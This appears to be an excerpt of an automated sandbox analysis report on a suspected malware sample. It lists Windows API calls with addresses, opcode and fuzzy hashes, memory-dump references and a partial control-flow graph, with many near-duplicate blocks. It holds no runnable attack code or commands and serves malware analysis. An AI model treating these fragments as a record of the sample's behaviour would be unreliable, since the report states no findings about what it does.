                                                                                          • API ID: Console$CharFile$AliasAllocAttributesBuffCharacterClassContextGlobalListOutputPathProcessRegisterTempThreadTypeUpperWrite_fputc
                                                                                          • String ID: $iEz$9X"e$=)W{$GhB$JG__$Kn6B$O2l[$T(7a$WTE$X!pq$Yx@t$[l1h$\Sj=$`*T$a*oJ$c<z$fPT$gew$hRjT$msX?$o%HQ$ogr($qu|a$w$w ~x$xF$zj\$|59M$~=l@$Wqu
                                                                                          • API String ID: 2287136171-2618368052
                                                                                          • Opcode ID: 6017953b2286c0fa0bd63261c4c2ee6cec5958200163e37f03c58e77bf105344
                                                                                          • Instruction ID: 60c594f9e99f8573c6b91579fb91971125de9a22c0a297299de556f99d693c23
                                                                                          • Opcode Fuzzy Hash: 6017953b2286c0fa0bd63261c4c2ee6cec5958200163e37f03c58e77bf105344
                                                                                          • Instruction Fuzzy Hash: CCA2C7B9609380CFC2B48F6AC1897CEF7E4BF99314F50890CE9DA9A611D73199858F47
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: be7d79059f30a6632f346b40d48af623ca80fe7e0d0fd30260e4fdf3c4bd5d1c
                                                                                          • Instruction ID: f8bec8c40e0bcd29496fa0cf97ecedeca28e3bc7d84904d8d51d713377df83fc
                                                                                          • Opcode Fuzzy Hash: be7d79059f30a6632f346b40d48af623ca80fe7e0d0fd30260e4fdf3c4bd5d1c
                                                                                          • Instruction Fuzzy Hash: B651D670608351DFD350CF19E984A1BBBF0FB88714F804A2EF599A7260D778AA45CF5A
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: 3267d5d4045f681505520417e46d6b00f70a95a090934160b91790928cfe3b43
                                                                                          • Instruction ID: 8dd27025a67b630aea2c51abe9a8d5dc4e0f30f91dd5c75df4b86855399a58bb
                                                                                          • Opcode Fuzzy Hash: 3267d5d4045f681505520417e46d6b00f70a95a090934160b91790928cfe3b43
                                                                                          • Instruction Fuzzy Hash: 2451D670608341DFD354CF18E984A1BB7F0FB88714F804A2EF599A7260D778AA45CF9A
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: d262bbbbb054dd9e0af2fd261a9670b976b0c1255ac637e0c76f3e22f10ff492
                                                                                          • Instruction ID: 03578a7b4f6c6d35950d53c300aa54986e2bb45db194f3eb22b294b21d6d9169
                                                                                          • Opcode Fuzzy Hash: d262bbbbb054dd9e0af2fd261a9670b976b0c1255ac637e0c76f3e22f10ff492
                                                                                          • Instruction Fuzzy Hash: 9351D770608351DFD354CF18E984A1BB7F0FB88714F804A2EF599A7260D778AA45CF9A
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004254F0
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 0042552C
                                                                                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042556C
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00425594
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004255A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 839357063-2435646076
                                                                                          • Opcode ID: c453552233aa2484b5919979abdf2a0c1f6ca6e3f273f9b289f303833cd9c91f
                                                                                          • Instruction ID: 161e6f0f1501fcadebe82a2c91f299c8d2c34500cdbccb8e8cbc861c62940b96
                                                                                          • Opcode Fuzzy Hash: c453552233aa2484b5919979abdf2a0c1f6ca6e3f273f9b289f303833cd9c91f
                                                                                          • Instruction Fuzzy Hash: 4B51B6B1608341DFC354CF19D98495BB7E4FB88308F408A2EF59993261D734EA49CF5A
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: gubudisajade
                                                                                          • API String ID: 839357063-2246108271
                                                                                          • Opcode ID: 7ffa989f119b1e5fd8bfcc0ce1236e49d3814146bb9aeffc03349017508c177b
                                                                                          • Instruction ID: 19e1274e2d8d635e776f0328ba3a0f9e9330088c357998f5873fd5beffdb6384
                                                                                          • Opcode Fuzzy Hash: 7ffa989f119b1e5fd8bfcc0ce1236e49d3814146bb9aeffc03349017508c177b
                                                                                          • Instruction Fuzzy Hash: D741D3706483418FD750CF28D985A1BBBE0FB88714F414A2EF599A7260D778AA48CB5A
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004254F0
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 0042552C
                                                                                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042556C
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00425594
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004255A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: gubudisajade
                                                                                          • API String ID: 839357063-2246108271
                                                                                          • Opcode ID: df8402451949e719ff5b4ab36404d298190f9ca66ed3921dc817d00862366706
                                                                                          • Instruction ID: 60cec3928c3c0daffd928a4105088abef14f0549786659fc7b8b75071443e789
                                                                                          • Opcode Fuzzy Hash: df8402451949e719ff5b4ab36404d298190f9ca66ed3921dc817d00862366706
                                                                                          • Instruction Fuzzy Hash: 3D41BAB16083419FD344CF28D984A5BF7F4FB88319F404A2EF59993250D738DA49CB5A
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000,00000000), ref: 0040E917
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000,00000000), ref: 0040E940
                                                                                          • GetACP.KERNEL32(?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000), ref: 0040E954
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 456dcd3922c0a97d23352467b51ca7b926e42d9be642dcd6f0f0e1207d8f67fe
                                                                                          • Instruction ID: 86282431c8fb740d179551cbcb83d1411fb15bd447682a9c8fc9a38e0f5a9903
                                                                                          • Opcode Fuzzy Hash: 456dcd3922c0a97d23352467b51ca7b926e42d9be642dcd6f0f0e1207d8f67fe
                                                                                          • Instruction Fuzzy Hash: DF0124B160520ABAEB219B62EC06F5B37A8DB04358F20483BF101F11E1EB78DE51869C
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000C068), ref: 0040C0AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 0b35d9765afdeda9bb72f4495ce6e86b6756aed2ceaa5d991d111d5dbf88c4af
                                                                                          • Instruction ID: d12c333fd2455dab7cfafed4b85865e262a8c065820cab7c2a29f1b1251f6b63
                                                                                          • Opcode Fuzzy Hash: 0b35d9765afdeda9bb72f4495ce6e86b6756aed2ceaa5d991d111d5dbf88c4af
                                                                                          • Instruction Fuzzy Hash: C1900270651101D6C6041BB45E4974525A05B9CB02B5186716501F84E4DE744008D61A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                          • Instruction ID: 45d640408adc51e9630250cd852087531390dd73839065ad220bbdb5f354db3c
                                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                          • Instruction Fuzzy Hash: B7C19173D0E5B2068B35422D041827FEE626E91B4431FC3F6DCD03F689C66AAE8696D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                          • Instruction ID: 30d8583d5410231f990eb28eb556ba3ebd30205fa5dc327a2a401abf38f30bfe
                                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                          • Instruction Fuzzy Hash: 68C14F73D0A5B205C775862D445823FEE626E91B4531FC3B6DCD03FAC9C23A6E0A96D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                          • Instruction ID: 16b00f723790cb557a0332ef0a33c36a400bf47c72533d95644a7e654be06258
                                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                          • Instruction Fuzzy Hash: 99C18373D1A5B205CB76852D441823FEE626E91B4531FC3B6DCD03FAC9C23A6E0A96D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                          • Instruction ID: e605e52e79a7629159be3138e0ece2ed07f43c6df0fbed25c8c7f3fb72a71265
                                                                                          • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                          • Instruction Fuzzy Hash: D8B17273D0A5B205CB75852D445823FEE626E91B4431FC3B6DCD03FAC9C63AAE0A96D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction ID: c1f8849e9c60afa41a7e76db1b4904fb5c5491e265f664ee0a2f2d98c25e15d6
                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction Fuzzy Hash: CE1130723401009FD758DE65DCE1FA673EAEB89360B298155E908CB316D679EC41CB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction ID: 91347f9c985dcbebfd0a4eeb01c32515266c115d5298d6eb2f6d7b06a0edc362
                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction Fuzzy Hash: 48113972340100AFDB54DF55DCC1FA673EAEB99760B2A8069E908CB316E676EC42C760

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 142 40a913-40a925 GetModuleHandleW 143 40a930-40a978 GetProcAddress * 4 142->143 144 40a927-40a92f call 40a660 142->144 146 40a990-40a9af 143->146 147 40a97a-40a981 143->147 150 40a9b4-40a9c2 TlsAlloc 146->150 147->146 149 40a983-40a98a 147->149 149->146 153 40a98c-40a98e 149->153 151 40a9c8-40a9d3 TlsSetValue 150->151 152 40aa89 150->152 151->152 154 40a9d9-40aa1f call 40764d EncodePointer * 4 call 40b764 151->154 155 40aa8b-40aa8d 152->155 153->146 153->150 160 40aa21-40aa3e DecodePointer 154->160 161 40aa84 call 40a660 154->161 160->161 164 40aa40-40aa52 call 4099fc 160->164 161->152 164->161 167 40aa54-40aa67 DecodePointer 164->167 167->161 169 40aa69-40aa82 call 40a69d GetCurrentThreadId 167->169 169->155
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00407BB7), ref: 0040A91B
                                                                                          • __mtterm.LIBCMT ref: 0040A927
                                                                                            • Part of subcall function 0040A660: DecodePointer.KERNEL32(00000005,0040AA89,?,00407BB7), ref: 0040A671
                                                                                            • Part of subcall function 0040A660: TlsFree.KERNEL32(00000002,0040AA89,?,00407BB7), ref: 0040A68B
                                                                                            • Part of subcall function 0040A660: DeleteCriticalSection.KERNEL32(00000000,00000000,77665810,?,0040AA89,?,00407BB7), ref: 0040B7CB
                                                                                            • Part of subcall function 0040A660: _free.LIBCMT ref: 0040B7CE
                                                                                            • Part of subcall function 0040A660: DeleteCriticalSection.KERNEL32(00000002,77665810,?,0040AA89,?,00407BB7), ref: 0040B7F5
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040A93D
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040A94A
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040A957
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040A964
                                                                                          • TlsAlloc.KERNEL32(?,00407BB7), ref: 0040A9B4
                                                                                          • TlsSetValue.KERNEL32(00000000,?,00407BB7), ref: 0040A9CF
                                                                                          • __init_pointers.LIBCMT ref: 0040A9D9
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040A9EA
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040A9F7
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040AA04
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040AA11
                                                                                          • DecodePointer.KERNEL32(0040A7E4,?,00407BB7), ref: 0040AA32
                                                                                          • __calloc_crt.LIBCMT ref: 0040AA47
                                                                                          • DecodePointer.KERNEL32(00000000,?,00407BB7), ref: 0040AA61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040AA73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNfw
                                                                                          • API String ID: 3698121176-1510553553
                                                                                          • Opcode ID: 8c9ca64a3d4f0f65c3a10dcc3d454d908beb19adb86461bb2d25de777e14fe7b
                                                                                          • Instruction ID: 5367a3aa28f6f5c5c198a4a719926eda5d08db90adbc4f29f7b004c2656550f2
                                                                                          • Opcode Fuzzy Hash: 8c9ca64a3d4f0f65c3a10dcc3d454d908beb19adb86461bb2d25de777e14fe7b
                                                                                          • Instruction Fuzzy Hash: E53195B0B023519BD771AF76AE096163FA0AB49760754093BE410B72F0D77C8492CF5E

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040505B
                                                                                            • Part of subcall function 004080C1: RaiseException.KERNEL32(00000004,?,?,>@), ref: 00408103
                                                                                          • std::exception::exception.LIBCMT ref: 0040503C
                                                                                            • Part of subcall function 00407340: std::exception::_Copy_str.LIBCMT ref: 0040735B
                                                                                          • std::exception::exception.LIBCMT ref: 0040507C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040509B
                                                                                          • std::exception::exception.LIBCMT ref: 004050B8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 004050D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
